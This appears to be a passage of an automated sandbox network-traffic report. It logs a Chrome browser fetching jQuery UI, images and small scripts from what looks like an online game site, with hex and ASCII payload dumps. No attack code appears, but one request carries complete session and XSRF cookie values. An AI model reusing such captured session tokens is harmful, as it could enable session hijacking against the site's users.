                                                      2025-01-12 23:47:50 UTC1058INData Raw: 34 31 36 0d 0a ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff fe 00 3e 43 52 45 41 54 4f 52 3a 20 67 64 2d 6a 70 65 67 20 76 31 2e 30 20 28 75 73 69 6e 67 20 49 4a 47 20 4a 50 45 47 20 76 36 32 29 2c 20 64 65 66 61 75 6c 74 20 71 75 61 6c 69 74 79 0a ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d 38 32 3c 2e 33 34 32 ff db 00 43 01 09 09 09 0c 0b 0c 18 0d 0d 18 32 21 1c 21 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 ff c0 00 11 08 00 17 00 38 03 01 22 00 02 11 01 03 11 01 ff c4 00 1f 00 00 01 05 01
                                                      Data Ascii: 416JFIF``>CREATOR: gd-jpeg v1.0 (using IJG JPEG v62), default qualityC $.' ",#(7),01444'9=82<.342C2!!222222222222222222222222222222222222222222222222228"


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      50192.168.2.44979820.255.122.934434284C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      TimestampBytes transferredDirectionData
                                                      2025-01-12 23:47:50 UTC388OUTGET /plus/plugin/js/jquery-ui.min.js?ver=1606790105 HTTP/1.1
                                                      Host: 5getfab.segrft.com
                                                      Connection: keep-alive
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                      Accept: */*
                                                      Sec-Fetch-Site: none
                                                      Sec-Fetch-Mode: cors
                                                      Sec-Fetch-Dest: empty
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en;q=0.9
                                                      2025-01-12 23:47:50 UTC320INHTTP/1.1 200 OK
                                                      Date: Sun, 12 Jan 2025 23:47:50 GMT
                                                      Content-Type: application/javascript
                                                      Content-Length: 253669
                                                      Connection: close
                                                      Vary: Accept-Encoding
                                                      Last-Modified: Tue, 01 Dec 2020 02:35:05 GMT
                                                      ETag: "5fc5abd9-3dee5"
                                                      Access-Control-Allow-Origin: *
                                                      Server: CDNoh
                                                      X-Cache-Status: HIT
                                                      Accept-Ranges: bytes
                                                      2025-01-12 23:47:50 UTC3776INData Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 55 49 20 2d 20 76 31 2e 31 32 2e 31 20 2d 20 32 30 31 36 2d 30 39 2d 31 34 0a 2a 20 68 74 74 70 3a 2f 2f 6a 71 75 65 72 79 75 69 2e 63 6f 6d 0a 2a 20 49 6e 63 6c 75 64 65 73 3a 20 77 69 64 67 65 74 2e 6a 73 2c 20 70 6f 73 69 74 69 6f 6e 2e 6a 73 2c 20 64 61 74 61 2e 6a 73 2c 20 64 69 73 61 62 6c 65 2d 73 65 6c 65 63 74 69 6f 6e 2e 6a 73 2c 20 65 66 66 65 63 74 2e 6a 73 2c 20 65 66 66 65 63 74 73 2f 65 66 66 65 63 74 2d 62 6c 69 6e 64 2e 6a 73 2c 20 65 66 66 65 63 74 73 2f 65 66 66 65 63 74 2d 62 6f 75 6e 63 65 2e 6a 73 2c 20 65 66 66 65 63 74 73 2f 65 66 66 65 63 74 2d 63 6c 69 70 2e 6a 73 2c 20 65 66 66 65 63 74 73 2f 65 66 66 65 63 74 2d 64 72 6f 70 2e 6a 73 2c 20 65 66 66 65 63 74 73 2f 65 66 66 65 63 74 2d 65 78 70 6c
                                                      Data Ascii: /*! jQuery UI - v1.12.1 - 2016-09-14* http://jqueryui.com* Includes: widget.js, position.js, data.js, disable-selection.js, effect.js, effects/effect-blind.js, effects/effect-bounce.js, effects/effect-clip.js, effects/effect-drop.js, effects/effect-expl
                                                      2025-01-12 23:47:50 UTC4096INData Raw: 74 68 69 73 2e 63 6c 61 73 73 4e 61 6d 65 2e 69 6e 64 65 78 4f 66 28 22 75 69 2d 64 61 74 65 70 69 63 6b 65 72 2d 70 72 65 76 22 29 26 26 74 28 74 68 69 73 29 2e 72 65 6d 6f 76 65 43 6c 61 73 73 28 22 75 69 2d 64 61 74 65 70 69 63 6b 65 72 2d 70 72 65 76 2d 68 6f 76 65 72 22 29 2c 2d 31 21 3d 3d 74 68 69 73 2e 63 6c 61 73 73 4e 61 6d 65 2e 69 6e 64 65 78 4f 66 28 22 75 69 2d 64 61 74 65 70 69 63 6b 65 72 2d 6e 65 78 74 22 29 26 26 74 28 74 68 69 73 29 2e 72 65 6d 6f 76 65 43 6c 61 73 73 28 22 75 69 2d 64 61 74 65 70 69 63 6b 65 72 2d 6e 65 78 74 2d 68 6f 76 65 72 22 29 7d 29 2e 6f 6e 28 22 6d 6f 75 73 65 6f 76 65 72 22 2c 69 2c 6f 29 7d 66 75 6e 63 74 69 6f 6e 20 6f 28 29 7b 74 2e 64 61 74 65 70 69 63 6b 65 72 2e 5f 69 73 44 69 73 61 62 6c 65 64 44 61 74
                                                      Data Ascii: this.className.indexOf("ui-datepicker-prev")&&t(this).removeClass("ui-datepicker-prev-hover"),-1!==this.className.indexOf("ui-datepicker-next")&&t(this).removeClass("ui-datepicker-next-hover")}).on("mouseover",i,o)}function o(){t.datepicker._isDisabledDat
                                                      2025-01-12 23:47:50 UTC4096INData Raw: 63 72 65 61 74 65 22 2c 6e 75 6c 6c 2c 74 68 69 73 2e 5f 67 65 74 43 72 65 61 74 65 45 76 65 6e 74 44 61 74 61 28 29 29 2c 74 68 69 73 2e 5f 69 6e 69 74 28 29 7d 2c 5f 67 65 74 43 72 65 61 74 65 4f 70 74 69 6f 6e 73 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 7b 7d 7d 2c 5f 67 65 74 43 72 65 61 74 65 45 76 65 6e 74 44 61 74 61 3a 74 2e 6e 6f 6f 70 2c 5f 63 72 65 61 74 65 3a 74 2e 6e 6f 6f 70 2c 5f 69 6e 69 74 3a 74 2e 6e 6f 6f 70 2c 64 65 73 74 72 6f 79 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 3d 74 68 69 73 3b 74 68 69 73 2e 5f 64 65 73 74 72 6f 79 28 29 2c 74 2e 65 61 63 68 28 74 68 69 73 2e 63 6c 61 73 73 65 73 45 6c 65 6d 65 6e 74 4c 6f 6f 6b 75 70 2c 66 75 6e 63 74 69 6f 6e 28 74 2c 69 29 7b 65 2e 5f 72 65 6d 6f 76 65 43 6c 61 73
                                                      Data Ascii: create",null,this._getCreateEventData()),this._init()},_getCreateOptions:function(){return{}},_getCreateEventData:t.noop,_create:t.noop,_init:t.noop,destroy:function(){var e=this;this._destroy(),t.each(this.classesElementLookup,function(t,i){e._removeClas
                                                      2025-01-12 23:47:50 UTC4096INData Raw: 61 72 20 6e 2c 6f 2c 61 3d 74 68 69 73 2e 6f 70 74 69 6f 6e 73 5b 65 5d 3b 69 66 28 73 3d 73 7c 7c 7b 7d 2c 69 3d 74 2e 45 76 65 6e 74 28 69 29 2c 69 2e 74 79 70 65 3d 28 65 3d 3d 3d 74 68 69 73 2e 77 69 64 67 65 74 45 76 65 6e 74 50 72 65 66 69 78 3f 65 3a 74 68 69 73 2e 77 69 64 67 65 74 45 76 65 6e 74 50 72 65 66 69 78 2b 65 29 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 2c 69 2e 74 61 72 67 65 74 3d 74 68 69 73 2e 65 6c 65 6d 65 6e 74 5b 30 5d 2c 6f 3d 69 2e 6f 72 69 67 69 6e 61 6c 45 76 65 6e 74 29 66 6f 72 28 6e 20 69 6e 20 6f 29 6e 20 69 6e 20 69 7c 7c 28 69 5b 6e 5d 3d 6f 5b 6e 5d 29 3b 72 65 74 75 72 6e 20 74 68 69 73 2e 65 6c 65 6d 65 6e 74 2e 74 72 69 67 67 65 72 28 69 2c 73 29 2c 21 28 74 2e 69 73 46 75 6e 63 74 69 6f 6e 28 61 29 26 26 61 2e 61
                                                      Data Ascii: ar n,o,a=this.options[e];if(s=s||{},i=t.Event(i),i.type=(e===this.widgetEventPrefix?e:this.widgetEventPrefix+e).toLowerCase(),i.target=this.element[0],o=i.originalEvent)for(n in o)n in i||(i[n]=o[n]);return this.element.trigger(i,s),!(t.isFunction(a)&&a.a
                                                      2025-01-12 23:47:50 UTC4096INData Raw: 77 69 64 74 68 3a 6c 2c 68 65 69 67 68 74 3a 63 7d 2c 68 6f 72 69 7a 6f 6e 74 61 6c 3a 30 3e 69 3f 22 6c 65 66 74 22 3a 65 3e 30 3f 22 72 69 67 68 74 22 3a 22 63 65 6e 74 65 72 22 2c 76 65 72 74 69 63 61 6c 3a 30 3e 72 3f 22 74 6f 70 22 3a 73 3e 30 3f 22 62 6f 74 74 6f 6d 22 3a 22 6d 69 64 64 6c 65 22 7d 3b 6c 3e 70 26 26 70 3e 61 28 65 2b 69 29 26 26 28 75 2e 68 6f 72 69 7a 6f 6e 74 61 6c 3d 22 63 65 6e 74 65 72 22 29 2c 63 3e 66 26 26 66 3e 61 28 73 2b 72 29 26 26 28 75 2e 76 65 72 74 69 63 61 6c 3d 22 6d 69 64 64 6c 65 22 29 2c 75 2e 69 6d 70 6f 72 74 61 6e 74 3d 6f 28 61 28 65 29 2c 61 28 69 29 29 3e 6f 28 61 28 73 29 2c 61 28 72 29 29 3f 22 68 6f 72 69 7a 6f 6e 74 61 6c 22 3a 22 76 65 72 74 69 63 61 6c 22 2c 6e 2e 75 73 69 6e 67 2e 63 61 6c 6c 28 74
                                                      Data Ascii: width:l,height:c},horizontal:0>i?"left":e>0?"right":"center",vertical:0>r?"top":s>0?"bottom":"middle"};l>p&&p>a(e+i)&&(u.horizontal="center"),c>f&&f>a(s+r)&&(u.vertical="middle"),u.important=o(a(e),a(i))>o(a(s),a(r))?"horizontal":"vertical",n.using.call(t
                                                      2025-01-12 23:47:50 UTC4096INData Raw: 2a 28 5c 64 2b 28 3f 3a 5c 2e 5c 64 2b 29 3f 29 5c 73 2a 2c 5c 73 2a 28 5c 64 2b 28 3f 3a 5c 2e 5c 64 2b 29 3f 29 5c 25 5c 73 2a 2c 5c 73 2a 28 5c 64 2b 28 3f 3a 5c 2e 5c 64 2b 29 3f 29 5c 25 5c 73 2a 28 3f 3a 2c 5c 73 2a 28 5c 64 3f 28 3f 3a 5c 2e 5c 64 2b 29 3f 29 5c 73 2a 29 3f 5c 29 2f 2c 73 70 61 63 65 3a 22 68 73 6c 61 22 2c 70 61 72 73 65 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 72 65 74 75 72 6e 5b 74 5b 31 5d 2c 74 5b 32 5d 2f 31 30 30 2c 74 5b 33 5d 2f 31 30 30 2c 74 5b 34 5d 5d 7d 7d 5d 2c 6c 3d 74 2e 43 6f 6c 6f 72 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 69 2c 73 2c 6e 29 7b 72 65 74 75 72 6e 20 6e 65 77 20 74 2e 43 6f 6c 6f 72 2e 66 6e 2e 70 61 72 73 65 28 65 2c 69 2c 73 2c 6e 29 7d 2c 63 3d 7b 72 67 62 61 3a 7b 70 72 6f 70 73 3a 7b 72 65 64 3a 7b
                                                      Data Ascii: *(\d+(?:\.\d+)?)\s*,\s*(\d+(?:\.\d+)?)\%\s*,\s*(\d+(?:\.\d+)?)\%\s*(?:,\s*(\d?(?:\.\d+)?)\s*)?\)/,space:"hsla",parse:function(t){return[t[1],t[2]/100,t[3]/100,t[4]]}}],l=t.Color=function(e,i,s,n){return new t.Color.fn.parse(e,i,s,n)},c={rgba:{props:{red:{
                                                      2025-01-12 23:47:50 UTC4096INData Raw: 6e 28 65 29 7b 76 61 72 20 69 3d 65 2e 73 70 6c 69 74 28 22 20 22 29 3b 66 28 69 2c 66 75 6e 63 74 69 6f 6e 28 65 2c 69 29 7b 74 2e 63 73 73 48 6f 6f 6b 73 5b 69 5d 3d 7b 73 65 74 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 6e 29 7b 76 61 72 20 6f 2c 61 2c 72 3d 22 22 3b 69 66 28 22 74 72 61 6e 73 70 61 72 65 6e 74 22 21 3d 3d 6e 26 26 28 22 73 74 72 69 6e 67 22 21 3d 3d 74 2e 74 79 70 65 28 6e 29 7c 7c 28 6f 3d 73 28 6e 29 29 29 29 7b 69 66 28 6e 3d 6c 28 6f 7c 7c 6e 29 2c 21 64 2e 72 67 62 61 26 26 31 21 3d 3d 6e 2e 5f 72 67 62 61 5b 33 5d 29 7b 66 6f 72 28 61 3d 22 62 61 63 6b 67 72 6f 75 6e 64 43 6f 6c 6f 72 22 3d 3d 3d 69 3f 65 2e 70 61 72 65 6e 74 4e 6f 64 65 3a 65 3b 28 22 22 3d 3d 3d 72 7c 7c 22 74 72 61 6e 73 70 61 72 65 6e 74 22 3d 3d 3d 72 29 26 26 61
                                                      Data Ascii: n(e){var i=e.split(" ");f(i,function(e,i){t.cssHooks[i]={set:function(e,n){var o,a,r="";if("transparent"!==n&&("string"!==t.type(n)||(o=s(n)))){if(n=l(o||n),!d.rgba&&1!==n._rgba[3]){for(a="backgroundColor"===i?e.parentNode:e;(""===r||"transparent"===r)&&a
                                                      2025-01-12 23:47:50 UTC4096INData Raw: 6f 70 3a 70 61 72 73 65 46 6c 6f 61 74 28 6f 5b 31 5d 29 7c 7c 30 2c 72 69 67 68 74 3a 22 61 75 74 6f 22 3d 3d 3d 6f 5b 32 5d 3f 69 3a 70 61 72 73 65 46 6c 6f 61 74 28 6f 5b 32 5d 29 2c 62 6f 74 74 6f 6d 3a 22 61 75 74 6f 22 3d 3d 3d 6f 5b 33 5d 3f 73 3a 70 61 72 73 65 46 6c 6f 61 74 28 6f 5b 33 5d 29 2c 6c 65 66 74 3a 70 61 72 73 65 46 6c 6f 61 74 28 6f 5b 34 5d 29 7c 7c 30 7d 7d 74 2e 65 78 70 72 26 26 74 2e 65 78 70 72 2e 66 69 6c 74 65 72 73 26 26 74 2e 65 78 70 72 2e 66 69 6c 74 65 72 73 2e 61 6e 69 6d 61 74 65 64 26 26 28 74 2e 65 78 70 72 2e 66 69 6c 74 65 72 73 2e 61 6e 69 6d 61 74 65 64 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 69 29 7b 72 65 74 75 72 6e 21 21 74 28 69 29 2e 64 61 74 61 28 64 29 7c 7c
                                                      Data Ascii: op:parseFloat(o[1])||0,right:"auto"===o[2]?i:parseFloat(o[2]),bottom:"auto"===o[3]?s:parseFloat(o[3]),left:parseFloat(o[4])||0}}t.expr&&t.expr.filters&&t.expr.filters.animated&&(t.expr.filters.animated=function(e){return function(i){return!!t(i).data(d)||
                                                      2025-01-12 23:47:50 UTC4096INData Raw: 64 65 3f 28 72 5b 6c 5d 28 29 2c 61 28 29 29 3a 6e 2e 63 61 6c 6c 28 72 5b 30 5d 2c 73 2c 69 29 3a 28 72 2e 69 73 28 22 3a 68 69 64 64 65 6e 22 29 3f 22 68 69 64 65 22 3d 3d 3d 6c 3a 22 73 68 6f 77 22 3d 3d 3d 6c 29 3f 28 72 5b 6c 5d 28 29 2c 61 28 29 29 3a 6e 2e 63 61 6c 6c 28 72 5b 30 5d 2c 73 2c 61 29 7d 76 61 72 20 73 3d 65 2e 61 70 70 6c 79 28 74 68 69 73 2c 61 72 67 75 6d 65 6e 74 73 29 2c 6e 3d 74 2e 65 66 66 65 63 74 73 2e 65 66 66 65 63 74 5b 73 2e 65 66 66 65 63 74 5d 2c 6f 3d 6e 2e 6d 6f 64 65 2c 61 3d 73 2e 71 75 65 75 65 2c 72 3d 61 7c 7c 22 66 78 22 2c 68 3d 73 2e 63 6f 6d 70 6c 65 74 65 2c 6c 3d 73 2e 6d 6f 64 65 2c 63 3d 5b 5d 2c 75 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 69 3d 74 28 74 68 69 73 29 2c 73 3d 74 2e 65 66 66 65 63
                                                      Data Ascii: de?(r[l](),a()):n.call(r[0],s,i):(r.is(":hidden")?"hide"===l:"show"===l)?(r[l](),a()):n.call(r[0],s,a)}var s=e.apply(this,arguments),n=t.effects.effect[s.effect],o=n.mode,a=s.queue,r=a||"fx",h=s.complete,l=s.mode,c=[],u=function(e){var i=t(this),s=t.effec
                                                      2025-01-12 23:47:50 UTC4096INData Raw: 69 6f 6e 28 65 2c 69 29 7b 76 61 72 20 73 2c 6e 3d 7b 7d 2c 6f 3d 74 28 74 68 69 73 29 2c 61 3d 65 2e 64 69 72 65 63 74 69 6f 6e 7c 7c 22 76 65 72 74 69 63 61 6c 22 2c 72 3d 22 62 6f 74 68 22 3d 3d 3d 61 2c 68 3d 72 7c 7c 22 68 6f 72 69 7a 6f 6e 74 61 6c 22 3d 3d 3d 61 2c 6c 3d 72 7c 7c 22 76 65 72 74 69 63 61 6c 22 3d 3d 3d 61 3b 73 3d 6f 2e 63 73 73 43 6c 69 70 28 29 2c 6e 2e 63 6c 69 70 3d 7b 74 6f 70 3a 6c 3f 28 73 2e 62 6f 74 74 6f 6d 2d 73 2e 74 6f 70 29 2f 32 3a 73 2e 74 6f 70 2c 72 69 67 68 74 3a 68 3f 28 73 2e 72 69 67 68 74 2d 73 2e 6c 65 66 74 29 2f 32 3a 73 2e 72 69 67 68 74 2c 62 6f 74 74 6f 6d 3a 6c 3f 28 73 2e 62 6f 74 74 6f 6d 2d 73 2e 74 6f 70 29 2f 32 3a 73 2e 62 6f 74 74 6f 6d 2c 6c 65 66 74 3a 68 3f 28 73 2e 72 69 67 68 74 2d 73 2e 6c
                                                      Data Ascii: ion(e,i){var s,n={},o=t(this),a=e.direction||"vertical",r="both"===a,h=r||"horizontal"===a,l=r||"vertical"===a;s=o.cssClip(),n.clip={top:l?(s.bottom-s.top)/2:s.top,right:h?(s.right-s.left)/2:s.right,bottom:l?(s.bottom-s.top)/2:s.bottom,left:h?(s.right-s.l


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      51192.168.2.44980020.255.122.934434284C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      TimestampBytes transferredDirectionData
                                                      2025-01-12 23:47:50 UTC667OUTGET /images_plus/header/common/kefu_icon.png HTTP/1.1
                                                      Host: 5getfab.segrft.com
                                                      Connection: keep-alive
                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                      sec-ch-ua-mobile: ?0
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                      sec-ch-ua-platform: "Windows"
                                                      Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                      Sec-Fetch-Site: cross-site
                                                      Sec-Fetch-Mode: no-cors
                                                      Sec-Fetch-Dest: image
                                                      Referer: https://5getfab.segrft.com/plus/css/custom/header_custom.css?ver=1685593131
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en;q=0.9
                                                      2025-01-12 23:47:50 UTC353INHTTP/1.1 200 OK
                                                      Date: Sun, 12 Jan 2025 23:47:50 GMT
                                                      Content-Type: image/png
                                                      Content-Length: 582
                                                      Connection: close
                                                      Last-Modified: Thu, 03 Dec 2020 05:14:15 GMT
                                                      ETag: "5fc87427-246"
                                                      Expires: Thu, 31 Dec 2037 23:55:55 GMT
                                                      Cache-Control: max-age=315360000
                                                      Access-Control-Allow-Origin: *
                                                      Server: CDNoh
                                                      X-Cache-Status: HIT
                                                      Accept-Ranges: bytes
                                                      2025-01-12 23:47:50 UTC582INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 0f 00 00 00 10 08 03 00 00 00 fe 88 d5 36 00 00 01 44 50 4c 54 45 00 00 00 40 2a 00 4d 3b 00 6f 63 33 66 54 22 5d 3e 00 67 44 00 8d 6a 00 10 07 00 00 00 0d 00 03 02 00 10 00 18 07 00 fc fc ed ff f5 e4 fd e2 d4 e6 ca b9 f8 e8 b5 bf b6 b0 fd e0 9a b6 98 85 ce a5 48 cd ad 23 39 17 06 0a 00 02 01 09 01 51 33 00 3a 1f 00 0c 0d 00 ff f9 e1 ec e5 df ff f0 dd ff e8 d8 f6 e9 d6 de d7 d1 e9 e4 d0 f7 dd ce cf c1 ce d6 cf c9 f1 d7 c8 eb df c7 f3 d3 c6 c6 dc c5 da d5 c1 e5 bc c0 fc e6 bf fa ee be fe e0 bc e0 d4 bc ef d6 b8 d6 c9 b6 de c4 b5 ee e1 ad dc c7 aa e6 d0 a9 e0 c7 a9 e2 c4 a8 eb d9 a7 df d3 a3 be a4 93 9c 9e 93 f5 d8 92 cb a7 91 d5 b4 87 c2 b6 86 76 78 84 c7 b5 83 e5 c8 82 cf ae 81 b3 9e 81 a2 96 7e b2
                                                      Data Ascii: PNGIHDR6DPLTE@*M;oc3fT"]>gDjH#9Q3:vx~


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      52192.168.2.44979920.255.122.934434284C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      TimestampBytes transferredDirectionData
                                                      2025-01-12 23:47:50 UTC379OUTGET /plus/js/custom/main.js?ver=1606790105 HTTP/1.1
                                                      Host: 5getfab.segrft.com
                                                      Connection: keep-alive
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                      Accept: */*
                                                      Sec-Fetch-Site: none
                                                      Sec-Fetch-Mode: cors
                                                      Sec-Fetch-Dest: empty
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en;q=0.9
                                                      2025-01-12 23:47:50 UTC316INHTTP/1.1 200 OK
                                                      Date: Sun, 12 Jan 2025 23:47:50 GMT
                                                      Content-Type: application/javascript
                                                      Content-Length: 1933
                                                      Connection: close
                                                      Vary: Accept-Encoding
                                                      Last-Modified: Tue, 01 Dec 2020 02:35:05 GMT
                                                      ETag: "5fc5abd9-78d"
                                                      Access-Control-Allow-Origin: *
                                                      Server: CDNoh
                                                      X-Cache-Status: HIT
                                                      Accept-Ranges: bytes
                                                      2025-01-12 23:47:50 UTC1933INData Raw: 24 28 66 75 6e 63 74 69 6f 6e 28 29 7b 0a 09 6c 6f 63 61 74 69 6f 6e 2e 68 61 73 68 2e 73 70 6c 69 74 28 27 23 27 29 2e 70 6f 70 28 29 3d 3d 27 79 7a 6d 45 72 72 6f 72 27 20 26 26 20 73 77 61 6c 28 27 e9 aa 8c e8 af 81 e7 a0 81 e4 b8 8d e6 ad a3 e7 a1 ae ef bc 8c e8 af b7 e9 87 8d e6 96 b0 e7 99 bb e5 bd 95 27 29 2c 6c 6f 63 61 74 69 6f 6e 2e 68 61 73 68 3d 27 27 20 0a 20 20 20 20 7c 7c 20 6c 6f 63 61 74 69 6f 6e 2e 68 61 73 68 2e 73 70 6c 69 74 28 27 23 27 29 2e 70 6f 70 28 29 3d 3d 27 6c 6f 67 69 6e 45 72 72 6f 72 27 20 26 26 20 73 77 61 6c 28 27 e5 af 86 e7 a0 81 e9 94 99 e8 af af e6 88 96 e8 80 85 e6 98 af e8 b4 a6 e5 8f b7 e4 b8 8d e5 ad 98 e5 9c a8 27 29 2c 6c 6f 63 61 74 69 6f 6e 2e 68 61 73 68 3d 27 27 3b 0a 7d 29 3b 0a 0a 66 75 6e 63 74 69 6f 6e
                                                      Data Ascii: $(function(){location.hash.split('#').pop()=='yzmError' && swal(''),location.hash='' || location.hash.split('#').pop()=='loginError' && swal(''),location.hash='';});function


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      53192.168.2.44980120.255.122.934434284C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      TimestampBytes transferredDirectionData
                                                      2025-01-12 23:47:50 UTC385OUTGET /plus/js/unite/share_unite.js?ver=1661222874 HTTP/1.1
                                                      Host: 5getfab.segrft.com
                                                      Connection: keep-alive
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                      Accept: */*
                                                      Sec-Fetch-Site: none
                                                      Sec-Fetch-Mode: cors
                                                      Sec-Fetch-Dest: empty
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en;q=0.9
                                                      2025-01-12 23:47:50 UTC315INHTTP/1.1 200 OK
                                                      Date: Sun, 12 Jan 2025 23:47:50 GMT
                                                      Content-Type: application/javascript
                                                      Content-Length: 943
                                                      Connection: close
                                                      Vary: Accept-Encoding
                                                      Last-Modified: Tue, 23 Aug 2022 02:47:54 GMT
                                                      ETag: "63043fda-3af"
                                                      Access-Control-Allow-Origin: *
                                                      Server: CDNoh
                                                      X-Cache-Status: HIT
                                                      Accept-Ranges: bytes
                                                      2025-01-12 23:47:50 UTC943INData Raw: 76 61 72 20 6c 6f 67 69 6e 5f 66 6c 61 67 3b 0a 24 28 66 75 6e 63 74 69 6f 6e 28 29 7b 0a 09 66 75 6e 63 74 69 6f 6e 20 70 6c 61 79 67 61 6d 65 5f 6d 6f 64 61 6c 28 74 79 70 65 2c 20 67 61 6d 65 69 64 2c 77 69 64 74 68 2c 68 65 69 67 68 74 29 7b 0a 09 09 69 66 28 74 79 70 65 20 3d 3d 20 27 74 72 79 27 29 20 74 79 70 65 20 3d 20 27 54 72 79 27 3b 0a 09 09 69 66 28 6c 6f 67 69 6e 5f 66 6c 61 67 20 7c 7c 20 74 79 70 65 3d 3d 27 54 72 79 27 29 7b 0a 09 09 09 77 69 6e 64 6f 77 2e 6f 70 65 6e 28 27 2f 6c 6f 61 64 47 61 6d 65 2f 27 2b 74 79 70 65 2b 27 2f 27 2b 67 61 6d 65 69 64 2c 20 27 3f 27 2b 4d 61 74 68 2e 72 61 6e 64 6f 6d 28 29 2c 20 27 6d 65 6e 75 62 61 72 3d 6e 6f 2c 73 74 61 74 75 73 3d 79 65 73 2c 73 63 72 6f 6c 6c 62 61 72 73 3d 79 65 73 2c 74 6f 70
                                                      Data Ascii: var login_flag;$(function(){function playgame_modal(type, gameid,width,height){if(type == 'try') type = 'Try';if(login_flag || type=='Try'){window.open('/loadGame/'+type+'/'+gameid, '?'+Math.random(), 'menubar=no,status=yes,scrollbars=yes,top


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      54192.168.2.449802154.86.18.44434284C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      TimestampBytes transferredDirectionData
                                                      2025-01-12 23:47:50 UTC982OUTGET /common/storage/cms/cms_1045.png?v=1611754636 HTTP/1.1
                                                      Host: b45032.com
                                                      Connection: keep-alive
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                      Accept: */*
                                                      Sec-Fetch-Site: none
                                                      Sec-Fetch-Mode: cors
                                                      Sec-Fetch-Dest: empty
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en;q=0.9
                                                      Cookie: XSRF-TOKEN=eyJpdiI6IjFzNTJBYWlhUVE2cm9IaVFueENOV2c9PSIsInZhbHVlIjoiYUc5ZDZYYWI2MHNkaERZRzlGWmYzcDI5RU1Tak5xZkZhbmJ2aERFSVo2WHFjaVFwWENHVGtUR2c3TDVJRUord3lwVWtNUjR0cmhMcnhqS0VlYVkxOWc9PSIsIm1hYyI6IjlkOTRmMGQyZTFjMjk0OWZjN2MxNWE4NDEzN2RmN2QxZWRkOTRjYjc5NmI0OGY0MWJkMzk4NjVkOTczNGMyMzIifQ%3D%3D; vanguard_session=eyJpdiI6InFxdUZ6ek0zT2J2bzY4VWt6WXJhVUE9PSIsInZhbHVlIjoiS1wvcUtlNnpZRkgwcUUwUm41RUdOTHo1aTNNeWZZR3lDQUtpNDhXeXlcLzdDMks2QmhDQ1wvbStXSEkxVUtzZFA3OUxRbFFxM1dER3RkemFlY2VGVlJVRkE9PSIsIm1hYyI6ImM3Zjg4MzBlNGE0OGJmZTQ0OTM5ZWQzODRlOGQxNjJhMmQwMmQ4NWZhODI5YWE4MGRkMGM0ZjI0OWQ2MWE3YzUifQ%3D%3D
                                                      2025-01-12 23:47:51 UTC431INHTTP/1.1 200 OK
                                                      Date: Sun, 12 Jan 2025 23:47:50 GMT
                                                      Content-Type: image/png
                                                      Content-Length: 25135
                                                      Connection: close
                                                      Alt-Svc: h3="67e285f0.t74nx2b2.com:443";ma=604800;persist=1,h2="bt5.tuf3a353.com:443";ma=604800;persist=1
                                                      Last-Modified: Wed, 27 Jan 2021 12:40:06 GMT
                                                      ETag: "60115f26-622f"
                                                      Expires: Thu, 31 Dec 2037 23:55:55 GMT
                                                      Cache-Control: max-age=315360000
                                                      X-Cache-Status: HIT
                                                      Server: nginx
                                                      Accept-Ranges: bytes
